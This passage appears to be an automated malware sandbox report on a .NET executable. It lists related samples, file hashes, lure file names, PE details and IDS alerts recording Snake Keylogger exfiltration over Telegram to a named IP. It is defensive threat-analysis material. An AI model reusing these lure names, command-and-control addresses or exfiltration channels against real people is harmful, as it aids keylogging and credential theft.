	Aisha C. Yetman shared you a document..msg	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	bfINGx7hvL.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	mSLEwIfTGL.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	kewyIO69TI.exe	Get hash	malicious	LummaC	Browse	104.21.58.182
	bfINGx7hvL.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
ORACLE-BMC-31898US	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Payment Advice.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	dekont.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	REMITTANCE ADVICE.xls	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	TLS20242025.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	GEsD6lobvy.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Dekont.rar.xlxs.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	dekont.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://smallpdf.com/sign-pdf/document#data=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwczovL2VzaWduLnNtYWxscGRmLXN0YWdpbmcuY29tIiwic3ViIjoiNjE3MmQyMzMtODcyNy00M2NhLWI1NjQtYjgwZDUyZjYxYmVjIiwiYXVkIjpbImVzaWduIl0sImV4cCI6MTcyODYzODEyMCwibmJmIjoxNzI3NDI4NTIwLCJpYXQiOjE3Mjc0Mjg1MjAsImp0aSI6IjYxNzJkMjMzLTg3MjctNDNjYS1iNTY0LWI4MGQ1MmY2MWJlYyIsInBheWxvYWQiOnsiZW52ZWxvcGVfaWQiOiI2ZWRlMzFjZS00Mzc2LTQwYzItYjJjNy1jMDc2Y2M3MjY4NjIiLCJzaWduX3JlcXVlc3RfaWQiOiI2MTcyZDIzMy04NzI3LTQzY2EtYjU2NC1iODBkNTJmNjFiZWMiLCJ0b2tlbl90eXBlIjoibm90aWZpY2F0aW9uIiwidXNlcl9lbWFpbCI6ImNoYW8ud3VAd3JpLm9yZyIsInVzZXJfZmlyc3RuYW1lIjoiY2hhby53dUB3cmkub3JnIiwidXNlcl9sYXN0bmFtZSI6ImNoYW8ud3VAd3JpLm9yZyJ9fQ.UX67GiHBKgjV8XyH-SFTt_KgB2I_q2j9cbGTSqbzRvY&eid=6ede31ce-4376-40c2-b2c7-c076cc726862&esrt=6172d233-8727-43ca-b564-b80d52f61bec	Get hash	malicious	Unknown	Browse	149.154.167.220
	8y4qT1eVpi.exe	Get hash	malicious	Amadey, Stealc	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	GfGxum1sf3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Teklif-6205018797-6100052155-UUE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	RFQ 2024.09.26-89 vivecta.vbs	Get hash	malicious	PureLog Stealer	Browse	149.154.167.220
	RTGS-WB-ABS-240730-NEW.lnk	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	#docs_8299010377388200191-pdf.js	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\.05.2024.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379552885213346
Encrypted:	false
SSDEEP:	48:fWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCsIfA2KRHmOugw1s
MD5:	3E5712DC6AFCA8CF60C5CB8BE65E2089
SHA1:	CDBAF3935912EFB05DBE58CA89C5422F07B528A0
SHA-256:	B9F7E5F0AFD718D8585A8B37DD8C459ECDD4E7E68C5FE61631D89CDD3E229833
SHA-512:	1BD81033EB26CD0EE3DEF6F02FECB4097D878D61CAA5BEF6739C51E889B99C9E695BECF51719959D33F7BA9838E202ADD7EE4DD704D5163B584F4E8B8B7ECC38
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xusvxm1.sgs.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hiw2simt.mfn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj0k2r1s.ffs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ombvvhhf.taa.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.922347728733782
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	.05.2024.exe
File size:	526'336 bytes
MD5:	d3720192678d263171733ef9ba7fa67c
SHA1:	1215ed86a8d470428d98cfe91eafb13c491dbcb4
SHA256:	e5c2ca734e0aaf255809667c558bad65384fe32f5a5fa2b7152cf01958916943
SHA512:	037563164849d5ae7db4acd308e45fb7cbffc3f564ba71a09cc6a6d8c9c764aa95f69667cbb40783cd026fa599b7bb3c3249c4abee4d142f027c4d6e62c59999
SSDEEP:	12288:8tLn7qQ74Si3SW2HRawGaSUtEry10Vlnv9AVwu:o7J7niiW2xaHmClnKVwu
TLSH:	7FB412CD6A9D7FD6CAAD03B0A131102403B89E3EA166F66F0FC4B8902D767D84614F97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...S^.f................................. ........@.. .......................`............@................................

File Icon


Icon Hash:	371e27252425232f

Static PE Info

General

Entrypoint:	0x480bce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F65E53 [Fri Sep 27 07:27:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x80b78	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0x1800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7ebd4	0x7ec00	91ddd772225b35a4a1c5385cfb8d0547	False	0.9519442646696252	data	7.935175361097534	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0x1800	0x1800	fb79a9e19556c3edfc06610d5845e8b6	False	0.2981770833333333	data	5.010756804017081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x84000	0xc	0x200	7fa284f148f481a210ba02ec28d407d5	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x82130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.25328330206378985
RT_GROUP_ICON	0x831d8	0x14	data	1.1
RT_VERSION	0x831ec	0x32c	data	0.4273399014778325
RT_MANIFEST	0x83518	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-27T12:52:09.595580+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49702	193.122.130.0	80	TCP
2024-09-27T12:52:10.783100+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49702	193.122.130.0	80	TCP
2024-09-27T12:52:11.370989+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49704	188.114.96.3	443	TCP
2024-09-27T12:52:12.475314+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49705	193.122.130.0	80	TCP
2024-09-27T12:52:14.064400+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49708	193.122.130.0	80	TCP
2024-09-27T12:52:18.729677+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49716	188.114.96.3	443	TCP
2024-09-27T12:52:27.432539+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49724	149.154.167.220	443	TCP
2024-09-27T12:52:37.592127+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49725	149.154.167.220	443	TCP
2024-09-27T12:52:38.549129+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49726	149.154.167.220	443	TCP
2024-09-27T12:52:39.491730+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49727	149.154.167.220	443	TCP
2024-09-27T12:52:40.422177+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49728	149.154.167.220	443	TCP
2024-09-27T12:52:41.529225+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49729	149.154.167.220	443	TCP
2024-09-27T12:52:42.672141+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49730	149.154.167.220	443	TCP
2024-09-27T12:52:44.705385+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49731	149.154.167.220	443	TCP
2024-09-27T12:52:45.606191+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49732	149.154.167.220	443	TCP
2024-09-27T12:52:46.527653+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49733	149.154.167.220	443	TCP
2024-09-27T12:52:47.515650+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49734	149.154.167.220	443	TCP
2024-09-27T12:52:48.484540+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49735	149.154.167.220	443	TCP
2024-09-27T12:52:49.398461+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49736	149.154.167.220	443	TCP
2024-09-27T12:52:51.106303+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49737	149.154.167.220	443	TCP
2024-09-27T12:52:52.142440+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49738	149.154.167.220	443	TCP
2024-09-27T12:52:53.062571+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49739	149.154.167.220	443	TCP
2024-09-27T12:52:53.983957+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49740	149.154.167.220	443	TCP
2024-09-27T12:52:54.920916+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49741	149.154.167.220	443	TCP
2024-09-27T12:52:55.913444+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49742	149.154.167.220	443	TCP
2024-09-27T12:52:56.825753+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49743	149.154.167.220	443	TCP
2024-09-27T12:52:57.707006+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49744	149.154.167.220	443	TCP
2024-09-27T12:52:58.614916+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49745	149.154.167.220	443	TCP
2024-09-27T12:52:59.536114+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49746	149.154.167.220	443	TCP
2024-09-27T12:53:00.657309+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49747	149.154.167.220	443	TCP
2024-09-27T12:53:02.582793+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49748	149.154.167.220	443	TCP
2024-09-27T12:53:03.633269+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49750	149.154.167.220	443	TCP
2024-09-27T12:53:05.655751+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49751	149.154.167.220	443	TCP
2024-09-27T12:53:06.735672+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49752	149.154.167.220	443	TCP
2024-09-27T12:53:08.007836+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49753	149.154.167.220	443	TCP
2024-09-27T12:53:09.233527+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49754	149.154.167.220	443	TCP
2024-09-27T12:53:10.370931+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49755	149.154.167.220	443	TCP
2024-09-27T12:53:11.307745+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49756	149.154.167.220	443	TCP
2024-09-27T12:53:20.500609+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49757	149.154.167.220	443	TCP
2024-09-27T12:53:21.525554+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49758	149.154.167.220	443	TCP
2024-09-27T12:53:22.513829+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49759	149.154.167.220	443	TCP
2024-09-27T12:53:23.617361+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49760	149.154.167.220	443	TCP
2024-09-27T12:53:24.907619+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49761	149.154.167.220	443	TCP
2024-09-27T12:53:27.280546+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49762	149.154.167.220	443	TCP
2024-09-27T12:53:28.929540+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49763	149.154.167.220	443	TCP
2024-09-27T12:53:29.853357+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49764	149.154.167.220	443	TCP
2024-09-27T12:53:30.767781+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49765	149.154.167.220	443	TCP
2024-09-27T12:53:31.704387+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49766	149.154.167.220	443	TCP
2024-09-27T12:53:32.668848+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49767	149.154.167.220	443	TCP
2024-09-27T12:53:33.590275+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49768	149.154.167.220	443	TCP
2024-09-27T12:53:35.082306+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49769	149.154.167.220	443	TCP
2024-09-27T12:53:36.002788+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49770	149.154.167.220	443	TCP
2024-09-27T12:53:36.956561+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49771	149.154.167.220	443	TCP
2024-09-27T12:53:37.886814+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49772	149.154.167.220	443	TCP
2024-09-27T12:53:38.796577+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49773	149.154.167.220	443	TCP
2024-09-27T12:53:39.800944+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49774	149.154.167.220	443	TCP
2024-09-27T12:53:41.197627+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49775	149.154.167.220	443	TCP
2024-09-27T12:53:42.487547+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49776	149.154.167.220	443	TCP
2024-09-27T12:53:43.425505+0200	2853006	ETPRO MALWARE Snake Keylogger Telegram Exfil	1	192.168.2.7	49777	149.154.167.220	443	TCP
